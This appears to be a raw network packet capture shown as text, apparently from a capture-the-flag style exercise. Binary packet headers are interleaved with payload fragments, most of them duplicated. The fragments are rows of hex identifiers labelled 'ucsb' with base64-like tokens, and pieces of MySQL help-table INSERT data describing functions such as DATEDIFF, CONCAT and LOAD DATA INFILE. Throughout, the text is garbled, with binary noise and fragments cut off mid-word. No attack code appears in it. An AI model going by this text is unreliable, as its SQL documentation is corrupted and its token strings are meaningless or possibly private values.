40545852B60CC67F8C2244F41234D4D5,ucsb,MTNzEwEDAyLAclh7JklIER/h2rQw6PUQEVQtRg==
BDAD3FCE9514BFC7ED48104ADD303BB6,ucsb,MTNzEwEDAyNcoid5Fg7FyAeO5DMzKQPwEp2lVA==
F2CC0F9F160430885983911699EEF77B,ucsb,MTNzEwEDAyQnGTL2eJwB8NH533KbgMUgnqqd9Q==
9FFEADE873CECF76DFF1EDD94D5ADA29,ucsb,MTNzEwEDAyVNYcNz1mnovSWkjCpHMEayfwXttA==
FD71C33B62275C29D0EDB12A971C8F8D,ucsb,MTNzEwEDAyYu8lEWHhUNrb1Njs4SXfag5w4eWg==
EDC0CFF20BE6161F09DC685BD135A6C8,ucsb,MTNzEwEDAyfN6msY+i5GM2Qu2RUYdWbHVoVfuw==
316ADA3CB938EE283950D28B9DE973C0,ucsb,MTNzEwEDAyirC8gJ852DQQpfrMLo38CTmFqiFQ==
416FEF40EBACA25118909110B5AD34E9,ucsb,MTNzEwEDAykn/pppJl3viuZJmtdje4xDZR3Lrg==
F7D937C0EDD90F41CD5208C0E7347F19,ucsb,MTNzEwEDAyo4NZFakrRqAaTVosGzfSBVZsxkqA==
45FD456A1DA7B3EC51E611C19B34B055,ucsb,MTNzEwEDAytefKrmxQe/dpj7fVG0quMMr0ss8Q==
86C2ADB42FADDEB3C13872051A785583,ucsb,MTNzEwEDAywvjxc7haPMJ/9Fqh2q2AbNWXPevw==
88B4D7C21718002D41A173CB163D7957,ucsb,MTNzEwEDAy2Kdos7q5scipI5ukBKNnUsbo9qsQ==
8932169EDD23565DE2DD0EDCD8006077,ucsb,MTNzEwEDAy5AF5KPVgOhXq2AvLa14NQ7t1vOMA==
0C57ABFDF89AB2950A2BEDBCEF88BAC6,ucsb,MTNzEwEDAy8HcD1GBalVmLYOdyWPssGU0B6G0A==
1C1D00D73557BDD7C5AB3A3C3C bbBi0`ET@/p܂Ao0E<5@?LB  3PXqtڀ  x); -> \'rbar\'',''),(328,'DATEDIFF',14,' DATEDIFF(expr,expr2)\n\n\nDATEDIFF() returns the number of days between the start date\nexpr and the end date expr2.\nexpr and expr2 are date or date-and-time expressions.\nOnly the date parts of the values are used in the calculation.\n','mysql> SELECT DATEDIFF(\'1997-12-31 23:59:59\',\'1997-12-30\');\n -> 1\nmysql> SELECT DATEDIFF(\'1997-11-30 23:59:59\',\'1997-12-31\');\n -> -31',''),(329,'BIN',23,' BIN(N)\nReturns a string representation of the binary value of N, where\nN is a longlong (BIGINT) number. This is equivalent to\nCONV(N,10,2). Returns NULL if N is NULL.\n','mysql> SELECT BIN(12);\n -> \'1100\'',''),(330,'MULTILINESTRING',2,' MultiLineString(ls1,ls2,...)\nConstructs a WKB MultiLineString value using WKB LineString\narguments. If any argument is not a WKB LineString, the return\nvalue is NULL.\n','',''),(331,'LOAD DATA',6,'The LOAD DATA INFILE statement reads rows from a text file into a\ntable at a very high speed.\nFor more information about the efficiency of INSERT versus\nLOAD DATA INFILE and speeding up LOAD DATA INFILE,\n[Insert speed].\n\nAs of MySQL 4.1, the character set indicated by the\ncharacter_set_database system variable is used to interpret the\ninformation in the C ZZBi0`EL@/܂Sŀo0E4h@? 3 Pֻހ'toa )IŌC ZZBi0`EL@/܂Sŀo0E4j@? 3 P'tjY )IŌC bb0`BiET@/Ԁo0SE<5@@KB  3PXqtڀ  x); -> \'rbar\'',''),(328,'DATEDIFF',14,' DATEDIFF(expr,expr2)\n\n\nDATEDIFF() returns the number of days between the start date\nexpr and the end date expr2.\nexpr and expr2 are date or date-and-time expressions.\nOnly the date parts of the values are used in the calculation.\n','mysql> SELECT DATEDIFF(\'1997-12-31 23:59:59\',\'1997-12-30\');\n -> 1\nmysql> SELECT DATEDIFF(\'1997-11-30 23:59:59\',\'1997-12-31\');\n -> -31',''),(329,'BIN',23,' BIN(N)\nReturns a string representation of the binary value of N, where\nN is a longlong (BIGINT) number. This is equivalent to\nCONV(N,10,2). Returns NULL if N is NULL.\n','mysql> SELECT BIN(12);\n -> \'1100\'',''),(330,'MULTILINESTRING',2,' MultiLineString(ls1,ls2,...)\nConstructs a WKB MultiLineString value using WKB LineString\narguments. If any argument is not a WKB LineString, the return\nvalue is NULL.\n','',''),(331,'LOAD DATA',6,'The LOAD DATA INFILE statement reads rows from a text file into a\ntable at a very high speed.\nFor more information about the efficiency of INSERT versus\nLOAD DATA INFILE and speeding up LOAD DATA INFILE,\n[Insert speed].\n\nAs of MySQL 4.1, the character set indicated by the\ncharacter_set_database system variable is used to interpret the\ninformation in the C ZZ0`BiEL@/go0AE4h@@ 3 Pֻހ'toa )IŌC ZZ0`BiEL@/go0AE4j@@ 3 P'tjY )IŌC ZZBi0`EL@/܂Sŀo0E4T@? 3 Ptj["lg )JC ZZ0`BiEL@/go0AE4T@@ 3 Ptj["lg )JC bbBi0`ET@/p܂Ao0E<6@?LA  3PX!ytڀ % x);file. SET NAMES and the setting of\ncharacter_set_client do not affect input interpretation.\n\nYou can also load data files by using the mysqlimport utility; it\noperates by sending a LOAD DATA INFILE statement to the server. The\n--local option causes mysqlimport to read data files from the\nclient host. You can specify the --compress option to get better\nperformance over slow networks if the client and server support the\ncompressed protocol.\nSee also : [mysqlimport, , mysqlimport].\n\nIf you specify the LOW_PRIORITY keyword, execution of the\nLOAD DATA statement is delayed until no other clients are reading\nfrom the table.\n\nIf you specify the CONCURRENT keyword with a MyISAM table that\nsatisfies the condition for concurrent inserts (that is, it contains no free\nblocks in the middle),\nthen other threads can retrieve data from the table while LOAD DATA\nis executing. Using this option affects the performance of LOAD DATA\na bit, even if no other thread is using the table at the same time.\n\nIf the LOCAL keyword is specified, it is\ninterpreted with respect to the client end of the connection:\n\n\n --- If LOCAL is specified, the file is read by the client program on the\nclient host and sent to the server. The file can be given as a full pathname\nto spC bb0`BiET@/Ԁo0SE<6@@KA  3PX!ytڀ % x);file. SET NAMES and the setting of\ncharacter_set_client do not affect input interpretation.\n\nYou can also load data files by using the mysqlimport utility; it\noperates by sending a LOAD DATA INFILE statement to the server. The\n--local option causes mysqlimport to read data files from the\nclient host. You can specify the --compress option to get better\nperformance over slow networks if the client and server support the\ncompressed protocol.\nSee also : [mysqlimport, , mysqlimport].\n\nIf you specify the LOW_PRIORITY keyword, execution of the\nLOAD DATA statement is delayed until no other clients are reading\nfrom the table.\n\nIf you specify the CONCURRENT keyword with a MyISAM table that\nsatisfies the condition for concurrent inserts (that is, it contains no free\nblocks in the middle),\nthen other threads can retrieve data from the table while LOAD DATA\nis executing. Using this option affects the performance of LOAD DATA\na bit, even if no other thread is using the table at the same time.\n\nIf the LOCAL keyword is specified, it is\ninterpreted with respect to the client end of the connection:\n\n\n --- If LOCAL is specified, the file is read by the client program on the\nclient host and sent to the server. The file can be given as a full pathname\nto spC ZZBi0`EL@/Ao0E4=@?  PXhqt +*@ dy̌C ZZ0`BiEL@/Eo0lE4=@@  PXhqt +*@ dy̌C bbBi0`ET@/p܂Ao0E<@?x  3P[tj ] z);,''),(8,'VAR_SAMP',12,' VAR_SAMP(expr)\nReturns the sample variance of expr. That is, the denominator is the\nnumber of rows minus one. This function was added in MySQL 5.0.3.\n','',''),(9,'CONCAT',23,' CONCAT(str1,str2,...)\nReturns the string that results from concatenating the arguments. Returns\nNULL if any argument is NULL. May have one or more arguments.\nIf all arguments are non-binary strings, the result is a non-binary string.\nIf the arguments include any binary strings, the result is a binary string.\nA numeric argument is converted to its equivalent binary string form.\n','mysql> SELECT CONCAT(\'My\', \'S\', \'QL\');\n -> \'MySQL\'\nmysql> SELECT CONCAT(\'My\', NULL, \'QL\');\n -> NULL\nmysql> SELECT CONCAT(14.3);\n -> \'14.3\'',''),(10,'GEOMETRY HIERARCHY',24,'Geometry is the base class. It\'s an abstract class.\nThe instantiable subclasses of Geometry are restricted to zero-, one-,\nand two-dimensional geometric objects that exist in\ntwo-dimensional coordinate space. All instantiable geometry classes are\ndefined so that valid instances of a geometry class are topologically closed\n(that is, all defined geometries include their boundary).\n\nThe base Geometry class has subclasses for Point,\nCurve, Surface, and GeometryColleC bb0`BiET@/Ԁo0SE<@@w  3P[tj ] z);,''),(8,'VAR_SAMP',12,' VAR_SAMP(expr)\nReturns the sample variance of expr. That is, the denominator is the\nnumber of rows minus one. This function was added in MySQL 5.0.3.\n','',''),(9,'CONCAT',23,' CONCAT(str1,str2,...)\nReturns the string that results from concatenating the arguments. Returns\nNULL if any argument is NULL. May have one or more arguments.\nIf all arguments are non-binary strings, the result is a non-binary string.\nIf the arguments include any binary strings, the result is a binary string.\nA numeric argument is converted to its equivalent binary string form.\n','mysql> SELECT CONCAT(\'My\', \'S\', \'QL\');\n -> \'MySQL\'\nmysql> SELECT CONCAT(\'My\', NULL, \'QL\');\n -> NULL\nmysql> SELECT CONCAT(14.3);\n -> \'14.3\'',''),(10,'GEOMETRY HIERARCHY',24,'Geometry is the base class. It\'s an abstract class.\nThe instantiable subclasses of Geometry are restricted to zero-, one-,\nand two-dimensional geometric objects that exist in\ntwo-dimensional coordinate space. All instantiable geometry classes are\ndefined so that valid instances of a geometry class are topologically closed\n(that is, all defined geometries include their boundary).\n\nThe base Geometry class has subclasses for Point,\nCurve, Surface, and GeometryColleC_ bbBi0`ET@/p܂Ao0E<@?x  3P`tj vi z);ction:\n\n\n --- Point represents zero-dimensional objects.\n\n --- Curve represents one-dimensional objects, and has subclass\nLineString, with sub-subclasses Line and LinearRing.\n\n --- Surface is designed for two-dimensional objects and\nhas subclass Polygon.\n\n --- GeometryCollection\nhas specialized zero-, one-, and two-dimensional collection classes named\nMultiPoint, MultiLineString, and MultiPolygon\nfor modeling geometries corresponding to collections of\nPoints, LineStrings, and Polygons, respectively.\nMultiCurve and MultiSurface are introduced as abstract superclasses\nthat generalize the collection interfaces to handle Curves and Surfaces.\n\n\nGeometry, Curve, Surface, MultiCurve,\nand MultiSurface are defined as non-instantiable classes.\nThey define a common set of methods for their subclasses and\nare included for extensibility.\n\nPoint, LineString, Polygon, GeometryCollection,\nMultiPoint, MultiLineString, and\nMultiPolygon are instantiable classes.\n','',''),(11,'CHAR FUNCTION',23,' CHAR(N,...)\nCHAR() interprets the arguments as integers and returns a string\nconsisting of the characters given by the code values of those\nintegers. NULL values are skipped.\n','mysql> SELECT CHAR(77,121,83,81,\'76\');\n -> \'MySQL\'\nmysql> SELECT CHAR(7C{ bb0`BiET@/Ԁo0SE<@@w  3P`tj vi z);ction:\n\n\n --- Point represents zero-dimensional objects.\n\n --- Curve represents one-dimensional objects, and has subclass\nLineString, with sub-subclasses Line and LinearRing.\n\n --- Surface is designed for two-dimensional objects and\nhas subclass Polygon.\n\n --- GeometryCollection\nhas specialized zero-, one-, and two-dimensional collection classes named\nMultiPoint, MultiLineString, and MultiPolygon\nfor modeling geometries corresponding to collections of\nPoints, LineStrings, and Polygons, respectively.\nMultiCurve and MultiSurface are introduced as abstract superclasses\nthat generalize the collection interfaces to handle Curves and Surfaces.\n\n\nGeometry, Curve, Surface, MultiCurve,\nand MultiSurface are defined as non-instantiable classes.\nThey define a common set of methods for their subclasses and\nare included for extensibility.\n\nPoint, LineString, Polygon, GeometryCollection,\nMultiPoint, MultiLineString, and\nMultiPolygon are instantiable classes.\n','',''),(11,'CHAR FUNCTION',23,' CHAR(N,...)\nCHAR() interprets the arguments as integers and returns a string\nconsisting of the characters given by the code values of those\nintegers. NULL values are skipped.\n','mysql> SELECT CHAR(77,121,83,81,\'76\');\n -> \'MySQL\'\nmysql> SELECT CHAR(7CF bbBi0`ET@/أ  o0E<|#@?  PeZ>̀  _cB5E11FA6,ucsb,MTNzEwEDA6D/NUpF6k+WLRDduslhXF0igq6FLA==
6BF3BD7AF94C88A397F3C8A69C48D840,ucsb,MTNzEwEDA6FC+A9GY1oJGURvSnSSaWQ7SbQb9A==
61CC04D270CE2FA29751C85F10B90FF2,ucsb,MTNzEwEDA6I5OtXxB8mzfQaTh1AZ4pVcfAGcCw==
751104A9447655590C97DD2770AD1FC0,ucsb,MTNzEwEDA6Oe1cWZVNVWGd8ayEZP7r06BqqEPg==
F56885E23C7942A323394C586607DB91,ucsb,MTNzEwEDA6QRg9ZE2lsETrTkGC2YMEU1a+s8Aw==
89E477D2C5C18996C3C863767E9E9B5E,ucsb,MTNzEwEDA6UQCgmhCXwRwCByw/fpeECWsoRlhg==
342C1EBD29424E6AA3064BECDB8C537A,ucsb,MTNzEwEDA6b8uKzPDNo1pvYjzpmBdDk43UGbaQ==
318AE2E07EA58CCC4D29E60993765B78,ucsb,MTNzEwEDA6fTn5SQjGSZBOmW7VBwG7/sU/M5mQ==
F6759F5ED8D8AA796BE93A8A51E83493,ucsb,MTNzEwEDA6j4aIV5dzxWoA7d1cvK2DkPtVS+LA==
BF5C21B4633316A6CF19BA4A4C3F25A9,ucsb,MTNzEwEDA6mhpoPQdElDRDr5M+qf9558nP9Aow==
6590EEC4724E6E1EF8A6470762E49776,ucsb,MTNzEwEDA6oMcOaE7eUgIa+ppmQe8zmMYMrrEQ==
A1BA4979C8175962C6DF52AA16F74A07,ucsb,MTNzEwEDA6v4bxig4d9d0YzrN0oOqoDJdx14zQ==
836BB2103707D5569FDA84207C0D2B8B,ucsb,MTNzEwEDA6xjVbCA802/ZdwIOqhl75Lr0fkidg==
6E4EEB7665478023BE00C89CF0C18B2F,ucsb,MTNzEwEDA63eSOZIYmhaoTMjKQgvbo0tgWH/eA==
362B41C6985C350DC5885B319C96E547,ucsb,MTNzEwEDA64yzykB2Ms/bap0iRFKGEuscaQqCQ==
09ACD3E37F2D745D0C41C821D575E1E8,ucsb,MTNzEwEDA6+Pv099jIiGbjoY3jUQCCa bb0`BiET@/o0AE<|#@@  PeZ>̀  _cB5E11FA6,ucsb,MTNzEwEDA6D/NUpF6k+WLRDduslhXF0igq6FLA==
6BF3BD7AF94C88A397F3C8A69C48D840,ucsb,MTNzEwEDA6FC+A9GY1oJGURvSnSSaWQ7SbQb9A==
61CC04D270CE2FA29751C85F10B90FF2,ucsb,MTNzEwEDA6I5OtXxB8mzfQaTh1AZ4pVcfAGcCw==
751104A9447655590C97DD2770AD1FC0,ucsb,MTNzEwEDA6Oe1cWZVNVWGd8ayEZP7r06BqqEPg==
F56885E23C7942A323394C586607DB91,ucsb,MTNzEwEDA6QRg9ZE2lsETrTkGC2YMEU1a+s8Aw==
89E477D2C5C18996C3C863767E9E9B5E,ucsb,MTNzEwEDA6UQCgmhCXwRwCByw/fpeECWsoRlhg==
342C1EBD29424E6AA3064BECDB8C537A,ucsb,MTNzEwEDA6b8uKzPDNo1pvYjzpmBdDk43UGbaQ==
318AE2E07EA58CCC4D29E60993765B78,ucsb,MTNzEwEDA6fTn5SQjGSZBOmW7VBwG7/sU/M5mQ==
F6759F5ED8D8AA796BE93A8A51E83493,ucsb,MTNzEwEDA6j4aIV5dzxWoA7d1cvK2DkPtVS+LA==
BF5C21B4633316A6CF19BA4A4C3F25A9,ucsb,MTNzEwEDA6mhpoPQdElDRDr5M+qf9558nP9Aow==
6590EEC4724E6E1EF8A6470762E49776,ucsb,MTNzEwEDA6oMcOaE7eUgIa+ppmQe8zmMYMrrEQ==
A1BA4979C8175962C6DF52AA16F74A07,ucsb,MTNzEwEDA6v4bxig4d9d0YzrN0oOqoDJdx14zQ==
836BB2103707D5569FDA84207C0D2B8B,ucsb,MTNzEwEDA6xjVbCA802/ZdwIOqhl75Lr0fkidg==
6E4EEB7665478023BE00C89CF0C18B2F,ucsb,MTNzEwEDA63eSOZIYmhaoTMjKQgvbo0tgWH/eA==
362B41C6985C350DC5885B319C96E547,ucsb,MTNzEwEDA64yzykB2Ms/bap0iRFKGEuscaQqCQ==
09ACD3E37F2D745D0C41C821D575E1E8,ucsb,MTNzEwEDA6+Pv099jIiGbjoY3jUQCC bbBi0`ET@/p܂Ao0E<@?x  3Petj  z);7,77.3,\'77.3\');\n -> \'MMM\'',''),(12,'DATETIME',1,'A date and time combination. The supported range is \'1000-01-01\n00:00:00\' to \'9999-12-31 23:59:59\'. MySQL displays\nDATETIME values in \'YYYY-MM-DD HH:MM:SS\' format, but allows you\nto assign values to DATETIME columns using either strings or numbers.\n','',''),(13,'LOWER',23,' LOWER(str)\nReturns the string str with all characters changed to lowercase\naccording to the current character set mapping (the default is ISO-8859-1\nLatin1).\n','mysql> SELECT LOWER(\'QUADRATICALLY\');\n -> \'quadratically\'',''),(14,'MONTH',14,' MONTH(date)\nReturns the month for date, in the range 1 to 12.\n','mysql> SELECT MONTH(\'1998-02-03\');\n -> 2',''),(15,'TINYINT',1,' TINYINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA very small integer. The signed range is -128 to 127. The\nunsigned range is 0 to 255.\n','',''),(16,'ISCLOSED',18,' IsClosed(ls)\nReturns 1 if the LineString value ls is closed\n(that is, its StartPoint() and EndPoint() values are the same).\nReturns 0 if ls is not closed, and -1 if it is NULL.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT IsClosed(GeomFromText(@ls));\n+-----------------------------+\n| IsClosed(GeomFromText(@ls)) |\n+-----------------------------+\n| C bb0`BiET@/Ԁo0SE<@@w  3Petj  z);7,77.3,\'77.3\');\n -> \'MMM\'',''),(12,'DATETIME',1,'A date and time combination. The supported range is \'1000-01-01\n00:00:00\' to \'9999-12-31 23:59:59\'. MySQL displays\nDATETIME values in \'YYYY-MM-DD HH:MM:SS\' format, but allows you\nto assign values to DATETIME columns using either strings or numbers.\n','',''),(13,'LOWER',23,' LOWER(str)\nReturns the string str with all characters changed to lowercase\naccording to the current character set mapping (the default is ISO-8859-1\nLatin1).\n','mysql> SELECT LOWER(\'QUADRATICALLY\');\n -> \'quadratically\'',''),(14,'MONTH',14,' MONTH(date)\nReturns the month for date, in the range 1 to 12.\n','mysql> SELECT MONTH(\'1998-02-03\');\n -> 2',''),(15,'TINYINT',1,' TINYINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA very small integer. The signed range is -128 to 127. The\nunsigned range is 0 to 255.\n','',''),(16,'ISCLOSED',18,' IsClosed(ls)\nReturns 1 if the LineString value ls is closed\n(that is, its StartPoint() and EndPoint() values are the same).\nReturns 0 if ls is not closed, and -1 if it is NULL.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT IsClosed(GeomFromText(@ls));\n+-----------------------------+\n| IsClosed(GeomFromText(@ls)) |\n+-----------------------------+\n| C bbBi0`ET@/,|po0E< 7@?  P2o? D kd[BB56031,ucsb,MTNzEwEDAzDts+n3qr8rmuFZXrN7SKnWdTe0mA==
9CDE7E2FEAD12914C9FA7D48B87FD257,ucsb,MTNzEwEDAzH86K8NvnAC8isUae0zn2O+630fMw==
BD41259E99EB5D21CA8E632C6361B233,ucsb,MTNzEwEDAzKpwL8ZaUPwc/lujTTb2GFHqbd4Mg==
53727F68596F1CEE8B2B5BE7635471CF,ucsb,MTNzEwEDAzNbyiW0S/iUECCEjrjq+MUkSE3R9g==
BA79758AFC541872066A9DA66BD9331E,ucsb,MTNzEwEDAzTDq4Y9Tm/y9VARweGD4qtpsWWhLA==
C4EBDAC8E063D6F10FA126763CD183CD,ucsb,MTNzEwEDAzWQsS7fBwYTSfY7gYHbWLbFUXBoug==
14CA0F67B89399EB10966CFEDAA5D390,ucsb,MTNzEwEDAzbLS9d151bqqwAGHt/ZiGrGfpSIeQ==
E950C13BF5BCF504185CD4A5E3E80247,ucsb,MTNzEwEDAzdocLTIeH7gBbD43kbbOF+Sx7M3cg==
65C5983E3677085BB1509165FAB5CFFC,ucsb,MTNzEwEDAzjv37FtgdrKkK1WnfB4QzTfmEiiEA==
E2BD9AEDEE8B04177B4AF7F9F7E2BB49,ucsb,MTNzEwEDAznUtOOMvDAVRbimcI5TD1F+gOD+5Q==
8ED263CDB9378F488C3CCFB6A4671C71,ucsb,MTNzEwEDAzrL25k5/iMg6iNdRskPUQS1qry/IA==
D5D647B425E0DFAA915EB11AAB5A82A3,ucsb,MTNzEwEDAzsOZug2MI2RWDn6cT3yTKb+38dA0w==
FA5B460DE329AF8AA8BD531C95C93747,ucsb,MTNzEwEDAzwte/YJONXyhc+yOFlwHOgm/x2kgQ==
3DDDFC99C4D1B43104B5EC8E56035D5B,ucsb,MTNzEwEDAz3+hoxokQ/atUSnaDCK0m+E3/nO9g==
988364ED3CF01F6C1FBACCA726B4C304,ucsb,MTNzEwEDAz4wXcAgRzBCoTnDSndGxkmqM/tfbg==
C001E4D3081FB7878AE9E499C15F7B54,ucsb,MTNzEwEDAz8u3G3c+MfQ9nfGnSQ2A9C ZZBi0`EL@/܂Sŀo0E4\9@?F 3 Pu}UԀ$ )J،C bb0`BiET@/o0AE< 7@@  P2o? D kd[BB56031,ucsb,MTNzEwEDAzDts+n3qr8rmuFZXrN7SKnWdTe0mA==
9CDE7E2FEAD12914C9FA7D48B87FD257,ucsb,MTNzEwEDAzH86K8NvnAC8isUae0zn2O+630fMw==
BD41259E99EB5D21CA8E632C6361B233,ucsb,MTNzEwEDAzKpwL8ZaUPwc/lujTTb2GFHqbd4Mg==
53727F68596F1CEE8B2B5BE7635471CF,ucsb,MTNzEwEDAzNbyiW0S/iUECCEjrjq+MUkSE3R9g==
BA79758AFC541872066A9DA66BD9331E,ucsb,MTNzEwEDAzTDq4Y9Tm/y9VARweGD4qtpsWWhLA==
C4EBDAC8E063D6F10FA126763CD183CD,ucsb,MTNzEwEDAzWQsS7fBwYTSfY7gYHbWLbFUXBoug==
14CA0F67B89399EB10966CFEDAA5D390,ucsb,MTNzEwEDAzbLS9d151bqqwAGHt/ZiGrGfpSIeQ==
E950C13BF5BCF504185CD4A5E3E80247,ucsb,MTNzEwEDAzdocLTIeH7gBbD43kbbOF+Sx7M3cg==
65C5983E3677085BB1509165FAB5CFFC,ucsb,MTNzEwEDAzjv37FtgdrKkK1WnfB4QzTfmEiiEA==
E2BD9AEDEE8B04177B4AF7F9F7E2BB49,ucsb,MTNzEwEDAznUtOOMvDAVRbimcI5TD1F+gOD+5Q==
8ED263CDB9378F488C3CCFB6A4671C71,ucsb,MTNzEwEDAzrL25k5/iMg6iNdRskPUQS1qry/IA==
D5D647B425E0DFAA915EB11AAB5A82A3,ucsb,MTNzEwEDAzsOZug2MI2RWDn6cT3yTKb+38dA0w==
FA5B460DE329AF8AA8BD531C95C93747,ucsb,MTNzEwEDAzwte/YJONXyhc+yOFlwHOgm/x2kgQ==
3DDDFC99C4D1B43104B5EC8E56035D5B,ucsb,MTNzEwEDAz3+hoxokQ/atUSnaDCK0m+E3/nO9g==
988364ED3CF01F6C1FBACCA726B4C304,ucsb,MTNzEwEDAz4wXcAgRzBCoTnDSndGxkmqM/tfbg==
C001E4D3081FB7878AE9E499C15F7B54,ucsb,MTNzEwEDAz8u3G3c+MfQ9nfGnSQ2A9C ZZ0`BiEL@/go0AE4\9@@F 3 Pu}UԀ$ )J،C bbBi0`ET@/,|po0E< 8@?  P2t? " ld[xlTJi/rg==
2724234B6342E636BD4AE266C8A02CD5,ucsb,MTNzEwEDA0CsMt0ClYYmGojrIuMSIYtt1QAu/A==
A8575267D3230E20C20F9994D3EE2618,ucsb,MTNzEwEDA0HyxfDTnmMeQIhLaqmDirHjyV6SaA==
9ADC96ED27DEC513E5BF876CBE22401F,ucsb,MTNzEwEDA0JDB/UXRRXCdoA0JwZO+O9STav5vA==
F7FA0981554DBA6CE588E33005563CA9,ucsb,MTNzEwEDA0O2JY+AVnz4KyvBTsGnvt23/5ieDA==
DAB7A127013A3D70FFB38C2CEDD61AD6,ucsb,MTNzEwEDA0TyJMRe7C2xMAB1oULfoAohr0iDFw==
B3CB70BBBA78D79C0CB53C3D60B04A83,ucsb,MTNzEwEDA0XTh/UFUyB9SjgAR5LLyBYpAIt9Zg==
A941C44E7F27020FE6408E06C56D1733,ucsb,MTNzEwEDA0bO7NPhzD8EO0G0K9oC8vlOceDKxw==
0E41946E4BC692619D7892F037E1F0D7,ucsb,MTNzEwEDA0esOfxjySIB12KtQBYtWRrEYdC46A==
79234416CCD099D68D5F885A4359369F,ucsb,MTNzEwEDA0iAGkrvudq/3B2A4xGqx1T8ce9eQA==
0222C0B989436D766A9D6CB865060205,ucsb,MTNzEwEDA0kZxaBjXPO46m7H6iTZqxMx/j/7vg==
C78A3CBE852573777F05CDCB0DA6E5EF,ucsb,MTNzEwEDA0ojs87T2e/1/DCzGtFAd4p0XkC8cg==
D3AF1A3B938A5468D96FBD2218F1D70C,ucsb,MTNzEwEDA0sdJxL3uAuIY8osQW4R1gJx44njwg==
03F999810F0C4524905BF277A8EF62D0,ucsb,MTNzEwEDA0zQIywuJDgwZePCMN0Pk1WKr1hGFQ==
B4C52A6C38D778DDE75A6B2094F24A09,ucsb,MTNzEwEDA00BYAQT+8b8UT0qwjdtqSx3aotSaA==
7E2DEB78B58331856530F19BD868C9C6,ucsb,MTNzEwEDA04pcunRGb+RcreeaHW73iHFm4Pthw==
1A84FE9CA5A27BE310A02EB53E55C ZZBi0`EL@/܂Sŀo0E4\;@?D 3 Pu}U$ )K،C bb0`BiET@/o0AE< 8@@  P2t? " ld[xlTJi/rg==
2724234B6342E636BD4AE266C8A02CD5,ucsb,MTNzEwEDA0CsMt0ClYYmGojrIuMSIYtt1QAu/A==
A8575267D3230E20C20F9994D3EE2618,ucsb,MTNzEwEDA0HyxfDTnmMeQIhLaqmDirHjyV6SaA==
9ADC96ED27DEC513E5BF876CBE22401F,ucsb,MTNzEwEDA0JDB/UXRRXCdoA0JwZO+O9STav5vA==
F7FA0981554DBA6CE588E33005563CA9,ucsb,MTNzEwEDA0O2JY+AVnz4KyvBTsGnvt23/5ieDA==
DAB7A127013A3D70FFB38C2CEDD61AD6,ucsb,MTNzEwEDA0TyJMRe7C2xMAB1oULfoAohr0iDFw==
B3CB70BBBA78D79C0CB53C3D60B04A83,ucsb,MTNzEwEDA0XTh/UFUyB9SjgAR5LLyBYpAIt9Zg==
A941C44E7F27020FE6408E06C56D1733,ucsb,MTNzEwEDA0bO7NPhzD8EO0G0K9oC8vlOceDKxw==
0E41946E4BC692619D7892F037E1F0D7,ucsb,MTNzEwEDA0esOfxjySIB12KtQBYtWRrEYdC46A==
79234416CCD099D68D5F885A4359369F,ucsb,MTNzEwEDA0iAGkrvudq/3B2A4xGqx1T8ce9eQA==
0222C0B989436D766A9D6CB865060205,ucsb,MTNzEwEDA0kZxaBjXPO46m7H6iTZqxMx/j/7vg==
C78A3CBE852573777F05CDCB0DA6E5EF,ucsb,MTNzEwEDA0ojs87T2e/1/DCzGtFAd4p0XkC8cg==
D3AF1A3B938A5468D96FBD2218F1D70C,ucsb,MTNzEwEDA0sdJxL3uAuIY8osQW4R1gJx44njwg==
03F999810F0C4524905BF277A8EF62D0,ucsb,MTNzEwEDA0zQIywuJDgwZePCMN0Pk1WKr1hGFQ==
B4C52A6C38D778DDE75A6B2094F24A09,ucsb,MTNzEwEDA00BYAQT+8b8UT0qwjdtqSx3aotSaA==
7E2DEB78B58331856530F19BD868C9C6,ucsb,MTNzEwEDA04pcunRGb+RcreeaHW73iHFm4Pthw==
1A84FE9CA5A27BE310A02EB53E55C% ZZ0`BiEL@/go0AE4\;@@D 3 Pu}U$ )K،C( bbBi0`ET@/p܂Ao0E<@?x  3Pjtj o {)< 0 |\n+-----------------------------+',''),(17,'MASTER_POS_WAIT',21,' MASTER_POS_WAIT(log_name,log_pos[,timeout])\n\nThis function is useful for control of master/slave synchronization.\nIt blocks until the slave has read and applied all updates up to the specified\nposition in the master log.\nThe return value is the number of log events it had to wait for to get to\nthe specified position. The function returns NULL if the slave SQL thread\nis not started, the slave\'s master information is not initialized, the\narguments are incorrect, or an error occurs. It returns -1 if the\ntimeout has been exceeded. If the slave SQL thread stops while\nMASTER_POS_WAIT() is waiting, the function returns NULL.\nIf the slave is past the specified position, the function returns\nimmediately.\n','SELECT MASTER_POS_WAIT(\'master_log_file\', master_log_pos)',''),(18,'^',27,' ^\nBitwise XOR:\n','mysql> SELECT 1 ^ 1;\n -> 0\nmysql> SELECT 1 ^ 0;\n -> 1\nmysql> SELECT 11 ^ 3;\n -> 8',''),(19,'DROP VIEW',24,'DROP VIEW removes one or more views. You must have the DROP\nprivilege for each view.\n\nYou can use the keywords IF EXISTS to prevent an error from occurring\nfor views that don\'t exist. When this clause is given, a NOTE is\ngeneratedCB bb0`BiET@/Ԁo0SE<@@w  3Pjtj o {)< 0 |\n+-----------------------------+',''),(17,'MASTER_POS_WAIT',21,' MASTER_POS_WAIT(log_name,log_pos[,timeout])\n\nThis function is useful for control of master/slave synchronization.\nIt blocks until the slave has read and applied all updates up to the specified\nposition in the master log.\nThe return value is the number of log events it had to wait for to get to\nthe specified position. The function returns NULL if the slave SQL thread\nis not started, the slave\'s master information is not initialized, the\narguments are incorrect, or an error occurs. It returns -1 if the\ntimeout has been exceeded. If the slave SQL thread stops while\nMASTER_POS_WAIT() is waiting, the function returns NULL.\nIf the slave is past the specified position, the function returns\nimmediately.\n','SELECT MASTER_POS_WAIT(\'master_log_file\', master_log_pos)',''),(18,'^',27,' ^\nBitwise XOR:\n','mysql> SELECT 1 ^ 1;\n -> 0\nmysql> SELECT 1 ^ 0;\n -> 1\nmysql> SELECT 11 ^ 3;\n -> 8',''),(19,'DROP VIEW',24,'DROP VIEW removes one or more views. You must have the DROP\nprivilege for each view.\n\nYou can use the keywords IF EXISTS to prevent an error from occurring\nfor views that don\'t exist. When this clause is given, a NOTE is\ngeneratedC bbBi0`ET@/p܂Ao0E<@?x  3Potj l$ |)< for each non-existent view.\nSee also : [SHOW WARNINGS, , SHOW WARNINGS].\n\nRESTRICT and CASCADE, if given, are parsed and ignored.\n','DROP VIEW [IF EXISTS]\n view_name [, view_name] ...\n [RESTRICT | 